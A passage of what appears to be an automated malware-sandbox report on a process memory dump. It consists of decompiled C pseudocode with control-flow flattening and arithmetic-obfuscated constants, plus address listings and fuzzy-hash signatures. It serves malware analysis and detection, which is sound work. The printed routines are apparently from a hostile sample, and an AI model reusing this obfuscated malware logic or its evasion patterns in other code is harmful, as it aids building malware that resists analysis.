                                                                                                                                                                                                                    							_t177 =  &_v52; // 0x303d5d59
                                                                                                                                                                                                                    							_t246 = _v40;
                                                                                                                                                                                                                    							E00A76A6B(_v40, _v108, _v112, _v88,  *_t177);
                                                                                                                                                                                                                    							_t270 =  &(_t270[3]);
                                                                                                                                                                                                                    							_t265 = 0xb35ace;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t265 == 0xb35ace) {
                                                                                                                                                                                                                    							E00A6D8E4(_t264, _v60, _v64);
                                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                                    							return _t235;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t265 == 0x104d823) {
                                                                                                                                                                                                                    							_t246 =  &_v44;
                                                                                                                                                                                                                    							_t231 = E00A625C8( &_v44, _v56, _v116, _v92, _v120, _t269);
                                                                                                                                                                                                                    							_t264 = _t231;
                                                                                                                                                                                                                    							_t270 =  &(_t270[4]);
                                                                                                                                                                                                                    							if(_t231 == 0) {
                                                                                                                                                                                                                    								goto L23;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							_t265 = 0x9fac602;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t265 == 0x1f1b32e) {
                                                                                                                                                                                                                    							_t265 = 0x546eb3f;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t265 != 0x546eb3f) {
                                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							_t269 = E00A7398C(_t246);
                                                                                                                                                                                                                    							_t265 = 0x104d823;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t265 == 0x7bc2302) {
                                                                                                                                                                                                                    						_t197 =  &_v68; // 0x303d5d59
                                                                                                                                                                                                                    						E00A7B060(_v28,  *_t197, _v96, _v24 + 1, _v100,  *0xa83b38 + 0xc);
                                                                                                                                                                                                                    						_t270 =  &(_t270[4]);
                                                                                                                                                                                                                    						_t235 = 1;
                                                                                                                                                                                                                    						_t265 = 0x73ef4cc;
                                                                                                                                                                                                                    						 *((intOrPtr*)( *0xa83b38 + 8)) = _v32;
                                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t265 == 0x88d2093) {
                                                                                                                                                                                                                    						_t227 = E00A631E4( &_v32, _v72,  &_v40, _v76);
                                                                                                                                                                                                                    						asm("sbb esi, esi");
                                                                                                                                                                                                                    						_t265 = ( ~_t227 & 0x007d2e36) + 0x73ef4cc;
                                                                                                                                                                                                                    						goto L1;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t265 != 0x9fac602) {
                                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t265 = 0xb35ace;
                                                                                                                                                                                                                    					if(_v44 > 2) {
                                                                                                                                                                                                                    						_t246 =  &_v36;
                                                                                                                                                                                                                    						_t234 = E00A78851( &_v36, _v104, _v48, _v80,  *((intOrPtr*)(_t264 + 8)), _v84);
                                                                                                                                                                                                                    						_t270 =  &(_t270[4]);
                                                                                                                                                                                                                    						_v40 = _t234;
                                                                                                                                                                                                                    						if(_t234 != 0) {
                                                                                                                                                                                                                    							_t265 = 0x88d2093;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                                    				} while (_t265 != 0x555f448);
                                                                                                                                                                                                                    				goto L23;
                                                                                                                                                                                                                    			}











































                                                                                                                                                                                                                    0x00a7d88a
                                                                                                                                                                                                                    0x00a7d88d
                                                                                                                                                                                                                    0x00a7d8a1
                                                                                                                                                                                                                    0x00a7d8a2
                                                                                                                                                                                                                    0x00a7d8a6
                                                                                                                                                                                                                    0x00a7d8a9
                                                                                                                                                                                                                    0x00a7d8aa
                                                                                                                                                                                                                    0x00a7d8af
                                                                                                                                                                                                                    0x00a7d8b0
                                                                                                                                                                                                                    0x00a7d8b8
                                                                                                                                                                                                                    0x00a7d8bd
                                                                                                                                                                                                                    0x00a7d8c5
                                                                                                                                                                                                                    0x00a7d8ca
                                                                                                                                                                                                                    0x00a7d8d2
                                                                                                                                                                                                                    0x00a7d8df
                                                                                                                                                                                                                    0x00a7d8e3
                                                                                                                                                                                                                    0x00a7d8eb
                                                                                                                                                                                                                    0x00a7d8f3
                                                                                                                                                                                                                    0x00a7d900
                                                                                                                                                                                                                    0x00a7d90c
                                                                                                                                                                                                                    0x00a7d910
                                                                                                                                                                                                                    0x00a7d918
                                                                                                                                                                                                                    0x00a7d920
                                                                                                                                                                                                                    0x00a7d92a
                                                                                                                                                                                                                    0x00a7d92b
                                                                                                                                                                                                                    0x00a7d92f
                                                                                                                                                                                                                    0x00a7d937
                                                                                                                                                                                                                    0x00a7d93f
                                                                                                                                                                                                                    0x00a7d947
                                                                                                                                                                                                                    0x00a7d94f
                                                                                                                                                                                                                    0x00a7d957
                                                                                                                                                                                                                    0x00a7d95f
                                                                                                                                                                                                                    0x00a7d967
                                                                                                                                                                                                                    0x00a7d96c
                                                                                                                                                                                                                    0x00a7d971
                                                                                                                                                                                                                    0x00a7d979
                                                                                                                                                                                                                    0x00a7d981
                                                                                                                                                                                                                    0x00a7d989
                                                                                                                                                                                                                    0x00a7d98e
                                                                                                                                                                                                                    0x00a7d996
                                                                                                                                                                                                                    0x00a7d99e
                                                                                                                                                                                                                    0x00a7d9a3
                                                                                                                                                                                                                    0x00a7d9ab
                                                                                                                                                                                                                    0x00a7d9b3
                                                                                                                                                                                                                    0x00a7d9bb
                                                                                                                                                                                                                    0x00a7d9c8
                                                                                                                                                                                                                    0x00a7d9cc
                                                                                                                                                                                                                    0x00a7d9d4
                                                                                                                                                                                                                    0x00a7d9dc
                                                                                                                                                                                                                    0x00a7d9e4
                                                                                                                                                                                                                    0x00a7d9ec
                                                                                                                                                                                                                    0x00a7d9f4
                                                                                                                                                                                                                    0x00a7d9fc
                                                                                                                                                                                                                    0x00a7da04
                                                                                                                                                                                                                    0x00a7da0c
                                                                                                                                                                                                                    0x00a7da14
                                                                                                                                                                                                                    0x00a7da22
                                                                                                                                                                                                                    0x00a7da26
                                                                                                                                                                                                                    0x00a7da2b
                                                                                                                                                                                                                    0x00a7da33
                                                                                                                                                                                                                    0x00a7da3b
                                                                                                                                                                                                                    0x00a7da40
                                                                                                                                                                                                                    0x00a7da4d
                                                                                                                                                                                                                    0x00a7da52
                                                                                                                                                                                                                    0x00a7da58
                                                                                                                                                                                                                    0x00a7da60
                                                                                                                                                                                                                    0x00a7da68
                                                                                                                                                                                                                    0x00a7da70
                                                                                                                                                                                                                    0x00a7da7d
                                                                                                                                                                                                                    0x00a7da7e
                                                                                                                                                                                                                    0x00a7da82
                                                                                                                                                                                                                    0x00a7da8a
                                                                                                                                                                                                                    0x00a7da92
                                                                                                                                                                                                                    0x00a7da9a
                                                                                                                                                                                                                    0x00a7daa2
                                                                                                                                                                                                                    0x00a7daaa
                                                                                                                                                                                                                    0x00a7dab2
                                                                                                                                                                                                                    0x00a7daba
                                                                                                                                                                                                                    0x00a7dac7
                                                                                                                                                                                                                    0x00a7dacb
                                                                                                                                                                                                                    0x00a7dad3
                                                                                                                                                                                                                    0x00a7dadb
                                                                                                                                                                                                                    0x00a7dae9
                                                                                                                                                                                                                    0x00a7daed
                                                                                                                                                                                                                    0x00a7daf5
                                                                                                                                                                                                                    0x00a7dafd
                                                                                                                                                                                                                    0x00a7db0a
                                                                                                                                                                                                                    0x00a7db0e
                                                                                                                                                                                                                    0x00a7db16
                                                                                                                                                                                                                    0x00a7db1e
                                                                                                                                                                                                                    0x00a7db26
                                                                                                                                                                                                                    0x00a7db2e
                                                                                                                                                                                                                    0x00a7db36
                                                                                                                                                                                                                    0x00a7db43
                                                                                                                                                                                                                    0x00a7db47
                                                                                                                                                                                                                    0x00a7db4c
                                                                                                                                                                                                                    0x00a7db54
                                                                                                                                                                                                                    0x00a7db58
                                                                                                                                                                                                                    0x00a7db58
                                                                                                                                                                                                                    0x00a7db5c
                                                                                                                                                                                                                    0x00a7db5c
                                                                                                                                                                                                                    0x00a7db5c
                                                                                                                                                                                                                    0x00a7db5c
                                                                                                                                                                                                                    0x00a7db62
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7db68
                                                                                                                                                                                                                    0x00a7dbd9
                                                                                                                                                                                                                    0x00a7dbe9
                                                                                                                                                                                                                    0x00a7dbed
                                                                                                                                                                                                                    0x00a7dbf2
                                                                                                                                                                                                                    0x00a7dbf5
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7dbf5
                                                                                                                                                                                                                    0x00a7db70
                                                                                                                                                                                                                    0x00a7dce9
                                                                                                                                                                                                                    0x00a7dcf2
                                                                                                                                                                                                                    0x00a7dcf8
                                                                                                                                                                                                                    0x00a7dcf8
                                                                                                                                                                                                                    0x00a7db7c
                                                                                                                                                                                                                    0x00a7dbb0
                                                                                                                                                                                                                    0x00a7dbc0
                                                                                                                                                                                                                    0x00a7dbc5
                                                                                                                                                                                                                    0x00a7dbc7
                                                                                                                                                                                                                    0x00a7dbcc
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7dbd2
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7dbd2
                                                                                                                                                                                                                    0x00a7db84
                                                                                                                                                                                                                    0x00a7dba4
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7dba4
                                                                                                                                                                                                                    0x00a7db8c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7db92
                                                                                                                                                                                                                    0x00a7db9b
                                                                                                                                                                                                                    0x00a7db9d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7db9d
                                                                                                                                                                                                                    0x00a7db8c
                                                                                                                                                                                                                    0x00a7dc05
                                                                                                                                                                                                                    0x00a7dcaa
                                                                                                                                                                                                                    0x00a7dcb5
                                                                                                                                                                                                                    0x00a7dcc5
                                                                                                                                                                                                                    0x00a7dcc8
                                                                                                                                                                                                                    0x00a7dcc9
                                                                                                                                                                                                                    0x00a7dcce
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7dcce
                                                                                                                                                                                                                    0x00a7dc11
                                                                                                                                                                                                                    0x00a7dc75
                                                                                                                                                                                                                    0x00a7dc7f
                                                                                                                                                                                                                    0x00a7dc88
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7dc88
                                                                                                                                                                                                                    0x00a7dc19
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7dc24
                                                                                                                                                                                                                    0x00a7dc29
                                                                                                                                                                                                                    0x00a7dc33
                                                                                                                                                                                                                    0x00a7dc46
                                                                                                                                                                                                                    0x00a7dc4b
                                                                                                                                                                                                                    0x00a7dc4e
                                                                                                                                                                                                                    0x00a7dc54
                                                                                                                                                                                                                    0x00a7dc5a
                                                                                                                                                                                                                    0x00a7dc5a
                                                                                                                                                                                                                    0x00a7dc54
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7dcd1
                                                                                                                                                                                                                    0x00a7dcd1
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: B&$Y"$Y]=0$Y]=0$qv
                                                                                                                                                                                                                    • API String ID: 0-1900205928
                                                                                                                                                                                                                    • Opcode ID: 8e49974e7c57c66a39c53dcfaca3383e886387439843e2486f6a535299fcce22
                                                                                                                                                                                                                    • Instruction ID: 185a2fa065c5bea04b01ba4fd3bb9e802ec08267a745ef9018cf776f8d47a3c3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e49974e7c57c66a39c53dcfaca3383e886387439843e2486f6a535299fcce22
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6B121724083419FD359CF65C98A81BFBF1BBC4748F51892DF5AA96220D3B19A09CF83
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                    			E00A77900(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                    				void* _t263;
                                                                                                                                                                                                                    				signed int _t299;
                                                                                                                                                                                                                    				signed int _t303;
                                                                                                                                                                                                                    				signed int _t307;
                                                                                                                                                                                                                    				signed int _t308;
                                                                                                                                                                                                                    				signed int _t309;
                                                                                                                                                                                                                    				signed int _t310;
                                                                                                                                                                                                                    				signed int _t311;
                                                                                                                                                                                                                    				void* _t333;
                                                                                                                                                                                                                    				void* _t340;
                                                                                                                                                                                                                    				void* _t345;
                                                                                                                                                                                                                    				void* _t346;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t345 = _t346 - 0x68;
                                                                                                                                                                                                                    				_push( *((intOrPtr*)(_t345 + 0x7c)));
                                                                                                                                                                                                                    				_t340 = __edx;
                                                                                                                                                                                                                    				_push( *((intOrPtr*)(_t345 + 0x78)));
                                                                                                                                                                                                                    				_push( *((intOrPtr*)(_t345 + 0x74)));
                                                                                                                                                                                                                    				_push( *((intOrPtr*)(_t345 + 0x70)));
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t263);
                                                                                                                                                                                                                    				 *(_t345 + 0x28) = 0x4a7bc2;
                                                                                                                                                                                                                    				_t307 = 0x7e;
                                                                                                                                                                                                                    				 *(_t345 + 0x28) =  *(_t345 + 0x28) * 0x2b;
                                                                                                                                                                                                                    				 *(_t345 + 0x28) =  *(_t345 + 0x28) >> 0xf;
                                                                                                                                                                                                                    				 *(_t345 + 0x28) =  *(_t345 + 0x28) ^ 0x00001904;
                                                                                                                                                                                                                    				 *(_t345 + 0x58) = 0xc65806;
                                                                                                                                                                                                                    				 *(_t345 + 0x58) =  *(_t345 + 0x58) | 0x3322210a;
                                                                                                                                                                                                                    				 *(_t345 + 0x58) =  *(_t345 + 0x58) / _t307;
                                                                                                                                                                                                                    				 *(_t345 + 0x58) =  *(_t345 + 0x58) | 0x62a93be0;
                                                                                                                                                                                                                    				 *(_t345 + 0x58) =  *(_t345 + 0x58) ^ 0x62e97de9;
                                                                                                                                                                                                                    				 *(_t345 + 4) = 0xd8f571;
                                                                                                                                                                                                                    				 *(_t345 + 4) =  *(_t345 + 4) << 5;
                                                                                                                                                                                                                    				 *(_t345 + 4) =  *(_t345 + 4) ^ 0x1b1ea620;
                                                                                                                                                                                                                    				 *(_t345 + 0x10) = 0x39f3f2;
                                                                                                                                                                                                                    				 *(_t345 + 0x10) =  *(_t345 + 0x10) >> 6;
                                                                                                                                                                                                                    				_t308 = 0xb;
                                                                                                                                                                                                                    				_t303 = 0x30;
                                                                                                                                                                                                                    				 *(_t345 + 0x10) =  *(_t345 + 0x10) * 0x66;
                                                                                                                                                                                                                    				 *(_t345 + 0x10) =  *(_t345 + 0x10) ^ 0x005940fa;
                                                                                                                                                                                                                    				 *(_t345 + 0x44) = 0x8c7b0e;
                                                                                                                                                                                                                    				 *(_t345 + 0x44) =  *(_t345 + 0x44) >> 0xe;
                                                                                                                                                                                                                    				 *(_t345 + 0x44) =  *(_t345 + 0x44) / _t308;
                                                                                                                                                                                                                    				 *(_t345 + 0x44) =  *(_t345 + 0x44) << 8;
                                                                                                                                                                                                                    				 *(_t345 + 0x44) =  *(_t345 + 0x44) ^ 0x00016564;
                                                                                                                                                                                                                    				 *(_t345 + 0x34) = 0xa4a029;
                                                                                                                                                                                                                    				 *(_t345 + 0x34) =  *(_t345 + 0x34) << 7;
                                                                                                                                                                                                                    				 *(_t345 + 0x34) =  *(_t345 + 0x34) / _t303;
                                                                                                                                                                                                                    				 *(_t345 + 0x34) =  *(_t345 + 0x34) ^ 0x01b312ca;
                                                                                                                                                                                                                    				 *(_t345 + 0x2c) = 0xe0d76f;
                                                                                                                                                                                                                    				 *(_t345 + 0x2c) =  *(_t345 + 0x2c) + 0xffff4bc0;
                                                                                                                                                                                                                    				 *(_t345 + 0x2c) =  *(_t345 + 0x2c) ^ 0xf4a32972;
                                                                                                                                                                                                                    				 *(_t345 + 0x2c) =  *(_t345 + 0x2c) ^ 0xf44a3808;
                                                                                                                                                                                                                    				 *(_t345 + 0x24) = 0x775d3a;
                                                                                                                                                                                                                    				 *(_t345 + 0x24) =  *(_t345 + 0x24) + 0x542b;
                                                                                                                                                                                                                    				_t309 = 0x4e;
                                                                                                                                                                                                                    				 *(_t345 + 0x24) =  *(_t345 + 0x24) / _t309;
                                                                                                                                                                                                                    				 *(_t345 + 0x24) =  *(_t345 + 0x24) ^ 0x00058a7e;
                                                                                                                                                                                                                    				 *(_t345 + 0x18) = 0x9881f7;
                                                                                                                                                                                                                    				 *(_t345 + 0x18) =  *(_t345 + 0x18) * 0x61;
                                                                                                                                                                                                                    				 *(_t345 + 0x18) =  *(_t345 + 0x18) * 0x29;
                                                                                                                                                                                                                    				 *(_t345 + 0x18) =  *(_t345 + 0x18) ^ 0x41311e65;
                                                                                                                                                                                                                    				 *(_t345 + 0x5c) = 0xb57c09;
                                                                                                                                                                                                                    				 *(_t345 + 0x5c) =  *(_t345 + 0x5c) | 0x53a974f8;
                                                                                                                                                                                                                    				 *(_t345 + 0x5c) =  *(_t345 + 0x5c) ^ 0xad407895;
                                                                                                                                                                                                                    				 *(_t345 + 0x5c) =  *(_t345 + 0x5c) | 0x15589cb6;
                                                                                                                                                                                                                    				 *(_t345 + 0x5c) =  *(_t345 + 0x5c) ^ 0xfffdb5e4;
                                                                                                                                                                                                                    				 *(_t345 + 0x3c) = 0x39ad93;
                                                                                                                                                                                                                    				 *(_t345 + 0x3c) =  *(_t345 + 0x3c) >> 0xc;
                                                                                                                                                                                                                    				 *(_t345 + 0x3c) =  *(_t345 + 0x3c) << 0xd;
                                                                                                                                                                                                                    				 *(_t345 + 0x3c) =  *(_t345 + 0x3c) ^ 0x0077256c;
                                                                                                                                                                                                                    				 *(_t345 + 0x14) = 0xfe036f;
                                                                                                                                                                                                                    				 *(_t345 + 0x14) =  *(_t345 + 0x14) >> 0xb;
                                                                                                                                                                                                                    				 *(_t345 + 0x14) =  *(_t345 + 0x14) >> 0xb;
                                                                                                                                                                                                                    				 *(_t345 + 0x14) =  *(_t345 + 0x14) ^ 0x00037536;
                                                                                                                                                                                                                    				 *(_t345 + 0x64) = 0xab5a98;
                                                                                                                                                                                                                    				 *(_t345 + 0x64) =  *(_t345 + 0x64) ^ 0xe2d1aef3;
                                                                                                                                                                                                                    				 *(_t345 + 0x64) =  *(_t345 + 0x64) + 0xc706;
                                                                                                                                                                                                                    				 *(_t345 + 0x64) =  *(_t345 + 0x64) ^ 0x90b34c82;
                                                                                                                                                                                                                    				 *(_t345 + 0x64) =  *(_t345 + 0x64) ^ 0x72ce25fb;
                                                                                                                                                                                                                    				 *(_t345 + 0x54) = 0xb47ebc;
                                                                                                                                                                                                                    				 *(_t345 + 0x54) =  *(_t345 + 0x54) << 2;
                                                                                                                                                                                                                    				 *(_t345 + 0x54) =  *(_t345 + 0x54) + 0xbd10;
                                                                                                                                                                                                                    				 *(_t345 + 0x54) =  *(_t345 + 0x54) >> 6;
                                                                                                                                                                                                                    				 *(_t345 + 0x54) =  *(_t345 + 0x54) ^ 0x00074fcf;
                                                                                                                                                                                                                    				 *(_t345 + 0x4c) = 0xcaba9a;
                                                                                                                                                                                                                    				 *(_t345 + 0x4c) =  *(_t345 + 0x4c) ^ 0x8a82a2a4;
                                                                                                                                                                                                                    				 *(_t345 + 0x4c) =  *(_t345 + 0x4c) / _t303;
                                                                                                                                                                                                                    				 *(_t345 + 0x4c) =  *(_t345 + 0x4c) + 0x9cc5;
                                                                                                                                                                                                                    				 *(_t345 + 0x4c) =  *(_t345 + 0x4c) ^ 0x02edec34;
                                                                                                                                                                                                                    				 *(_t345 + 0x38) = 0x33d25;
                                                                                                                                                                                                                    				 *(_t345 + 0x38) =  *(_t345 + 0x38) | 0x933e2683;
                                                                                                                                                                                                                    				 *(_t345 + 0x38) =  *(_t345 + 0x38) >> 0xd;
                                                                                                                                                                                                                    				 *(_t345 + 0x38) =  *(_t345 + 0x38) ^ 0x00089543;
                                                                                                                                                                                                                    				 *(_t345 + 0xc) = 0x1ce276;
                                                                                                                                                                                                                    				 *(_t345 + 0xc) =  *(_t345 + 0xc) << 8;
                                                                                                                                                                                                                    				 *(_t345 + 0xc) =  *(_t345 + 0xc) ^ 0xce704670;
                                                                                                                                                                                                                    				 *(_t345 + 0xc) =  *(_t345 + 0xc) ^ 0xd29e1eab;
                                                                                                                                                                                                                    				 *(_t345 + 0x1c) = 0xc5c88c;
                                                                                                                                                                                                                    				 *(_t345 + 0x1c) =  *(_t345 + 0x1c) | 0x4334f429;
                                                                                                                                                                                                                    				 *(_t345 + 0x1c) =  *(_t345 + 0x1c) ^ 0x4cfcf878;
                                                                                                                                                                                                                    				 *(_t345 + 0x1c) =  *(_t345 + 0x1c) ^ 0x0f0c1fdb;
                                                                                                                                                                                                                    				 *(_t345 + 8) = 0x400a6c;
                                                                                                                                                                                                                    				 *(_t345 + 8) =  *(_t345 + 8) ^ 0xbace2bec;
                                                                                                                                                                                                                    				 *(_t345 + 8) =  *(_t345 + 8) ^ 0xba8bdb56;
                                                                                                                                                                                                                    				 *(_t345 + 0x60) = 0x3c3efe;
                                                                                                                                                                                                                    				 *(_t345 + 0x60) =  *(_t345 + 0x60) ^ 0x69df840d;
                                                                                                                                                                                                                    				_t310 = 0x24;
                                                                                                                                                                                                                    				 *(_t345 + 0x60) =  *(_t345 + 0x60) / _t310;
                                                                                                                                                                                                                    				 *(_t345 + 0x60) =  *(_t345 + 0x60) + 0xdb17;
                                                                                                                                                                                                                    				 *(_t345 + 0x60) =  *(_t345 + 0x60) ^ 0x02f1b90a;
                                                                                                                                                                                                                    				 *(_t345 + 0x30) = 0xd2ca07;
                                                                                                                                                                                                                    				 *(_t345 + 0x30) =  *(_t345 + 0x30) ^ 0x260ee29f;
                                                                                                                                                                                                                    				 *(_t345 + 0x30) =  *(_t345 + 0x30) | 0x9b8fcb9d;
                                                                                                                                                                                                                    				 *(_t345 + 0x30) =  *(_t345 + 0x30) ^ 0xbfd09918;
                                                                                                                                                                                                                    				 *(_t345 + 0x20) = 0xa6aaf0;
                                                                                                                                                                                                                    				 *(_t345 + 0x20) =  *(_t345 + 0x20) + 0x2314;
                                                                                                                                                                                                                    				_t311 = 0x32;
                                                                                                                                                                                                                    				 *(_t345 + 0x20) =  *(_t345 + 0x20) / _t311;
                                                                                                                                                                                                                    				 *(_t345 + 0x20) =  *(_t345 + 0x20) ^ 0x0009741e;
                                                                                                                                                                                                                    				 *(_t345 + 0x40) = 0xfb72e4;
                                                                                                                                                                                                                    				 *(_t345 + 0x40) =  *(_t345 + 0x40) * 0x79;
                                                                                                                                                                                                                    				 *(_t345 + 0x40) =  *(_t345 + 0x40) >> 2;
                                                                                                                                                                                                                    				 *(_t345 + 0x40) =  *(_t345 + 0x40) + 0xffffdfed;
                                                                                                                                                                                                                    				 *(_t345 + 0x40) =  *(_t345 + 0x40) ^ 0x1db75f01;
                                                                                                                                                                                                                    				 *(_t345 + 0x48) = 0x37ade7;
                                                                                                                                                                                                                    				 *(_t345 + 0x48) =  *(_t345 + 0x48) >> 0xa;
                                                                                                                                                                                                                    				 *(_t345 + 0x48) =  *(_t345 + 0x48) | 0xc5ffe66b;
                                                                                                                                                                                                                    				 *(_t345 + 0x48) =  *(_t345 + 0x48) >> 0xc;
                                                                                                                                                                                                                    				 *(_t345 + 0x48) =  *(_t345 + 0x48) ^ 0x0004e36c;
                                                                                                                                                                                                                    				 *(_t345 + 0x50) = 0xee50e8;
                                                                                                                                                                                                                    				 *(_t345 + 0x50) =  *(_t345 + 0x50) >> 7;
                                                                                                                                                                                                                    				 *(_t345 + 0x50) =  *(_t345 + 0x50) + 0xee10;
                                                                                                                                                                                                                    				 *(_t345 + 0x50) =  *(_t345 + 0x50) ^ 0x22e2faae;
                                                                                                                                                                                                                    				 *(_t345 + 0x50) =  *(_t345 + 0x50) ^ 0x22e5194c;
                                                                                                                                                                                                                    				_push( *(_t345 + 0x2c));
                                                                                                                                                                                                                    				_push( *(_t345 + 0x34));
                                                                                                                                                                                                                    				_push( *(_t345 + 0x44));
                                                                                                                                                                                                                    				_push(_t345 - 0x1c);
                                                                                                                                                                                                                    				_t333 = 0x1e;
                                                                                                                                                                                                                    				E00A73FA6( *(_t345 + 0x10), _t333);
                                                                                                                                                                                                                    				E00A73FA6( *(_t345 + 0x24), 0x208, _t345 - 0x224,  *(_t345 + 0x18),  *(_t345 + 0x5c),  *(_t345 + 0x3c));
                                                                                                                                                                                                                    				E00A73FA6( *(_t345 + 0x14), 0x208, _t345 - 0x42c,  *(_t345 + 0x64),  *(_t345 + 0x54),  *(_t345 + 0x4c));
                                                                                                                                                                                                                    				E00A705ED(__ecx, _t345 - 0x224,  *(_t345 + 0x38),  *(_t345 + 0xc),  *(_t345 + 0x1c));
                                                                                                                                                                                                                    				E00A705ED(_t340, _t345 - 0x42c,  *(_t345 + 8),  *(_t345 + 0x60),  *(_t345 + 0x30));
                                                                                                                                                                                                                    				 *(_t345 - 0x18) =  *(_t345 + 0x28);
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t345 - 0x14)) = _t345 - 0x224;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t345 - 0x10)) = _t345 - 0x42c;
                                                                                                                                                                                                                    				 *((short*)(_t345 - 0xc)) =  *(_t345 + 4) |  *(_t345 + 0x58) | 0x00000410;
                                                                                                                                                                                                                    				_t299 = E00A7755D( *(_t345 + 0x20),  *(_t345 + 0x40),  *(_t345 + 0x48), _t345 - 0x1c,  *(_t345 + 0x50));
                                                                                                                                                                                                                    				asm("sbb eax, eax");
                                                                                                                                                                                                                    				return  ~_t299 + 1;
                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                    0x00a77901
                                                                                                                                                                                                                    0x00a7790e
                                                                                                                                                                                                                    0x00a77911
                                                                                                                                                                                                                    0x00a77915
                                                                                                                                                                                                                    0x00a77918
                                                                                                                                                                                                                    0x00a7791b
                                                                                                                                                                                                                    0x00a7791e
                                                                                                                                                                                                                    0x00a7791f
                                                                                                                                                                                                                    0x00a77920
                                                                                                                                                                                                                    0x00a77925
                                                                                                                                                                                                                    0x00a77934
                                                                                                                                                                                                                    0x00a77937
                                                                                                                                                                                                                    0x00a7793a
                                                                                                                                                                                                                    0x00a7793e
                                                                                                                                                                                                                    0x00a77945
                                                                                                                                                                                                                    0x00a7794c
                                                                                                                                                                                                                    0x00a7795a
                                                                                                                                                                                                                    0x00a7795d
                                                                                                                                                                                                                    0x00a77964
                                                                                                                                                                                                                    0x00a7796b
                                                                                                                                                                                                                    0x00a77972
                                                                                                                                                                                                                    0x00a77976
                                                                                                                                                                                                                    0x00a7797d
                                                                                                                                                                                                                    0x00a77984
                                                                                                                                                                                                                    0x00a7798c
                                                                                                                                                                                                                    0x00a7798f
                                                                                                                                                                                                                    0x00a77992
                                                                                                                                                                                                                    0x00a77995
                                                                                                                                                                                                                    0x00a7799c
                                                                                                                                                                                                                    0x00a779a3
                                                                                                                                                                                                                    0x00a779ae
                                                                                                                                                                                                                    0x00a779b1
                                                                                                                                                                                                                    0x00a779b5
                                                                                                                                                                                                                    0x00a779bc
                                                                                                                                                                                                                    0x00a779c3
                                                                                                                                                                                                                    0x00a779ce
                                                                                                                                                                                                                    0x00a779d1
                                                                                                                                                                                                                    0x00a779d8
                                                                                                                                                                                                                    0x00a779df
                                                                                                                                                                                                                    0x00a779e6
                                                                                                                                                                                                                    0x00a779ed
                                                                                                                                                                                                                    0x00a779f4
                                                                                                                                                                                                                    0x00a779fb
                                                                                                                                                                                                                    0x00a77a05
                                                                                                                                                                                                                    0x00a77a08
                                                                                                                                                                                                                    0x00a77a0b
                                                                                                                                                                                                                    0x00a77a12
                                                                                                                                                                                                                    0x00a77a1d
                                                                                                                                                                                                                    0x00a77a24
                                                                                                                                                                                                                    0x00a77a27
                                                                                                                                                                                                                    0x00a77a2e
                                                                                                                                                                                                                    0x00a77a35
                                                                                                                                                                                                                    0x00a77a3c
                                                                                                                                                                                                                    0x00a77a43
                                                                                                                                                                                                                    0x00a77a4a
                                                                                                                                                                                                                    0x00a77a51
                                                                                                                                                                                                                    0x00a77a58
                                                                                                                                                                                                                    0x00a77a5c
                                                                                                                                                                                                                    0x00a77a60
                                                                                                                                                                                                                    0x00a77a69
                                                                                                                                                                                                                    0x00a77a70
                                                                                                                                                                                                                    0x00a77a74
                                                                                                                                                                                                                    0x00a77a78
                                                                                                                                                                                                                    0x00a77a7f
                                                                                                                                                                                                                    0x00a77a86
                                                                                                                                                                                                                    0x00a77a8d
                                                                                                                                                                                                                    0x00a77a94
                                                                                                                                                                                                                    0x00a77a9b
                                                                                                                                                                                                                    0x00a77aa2
                                                                                                                                                                                                                    0x00a77aa9
                                                                                                                                                                                                                    0x00a77aad
                                                                                                                                                                                                                    0x00a77ab4
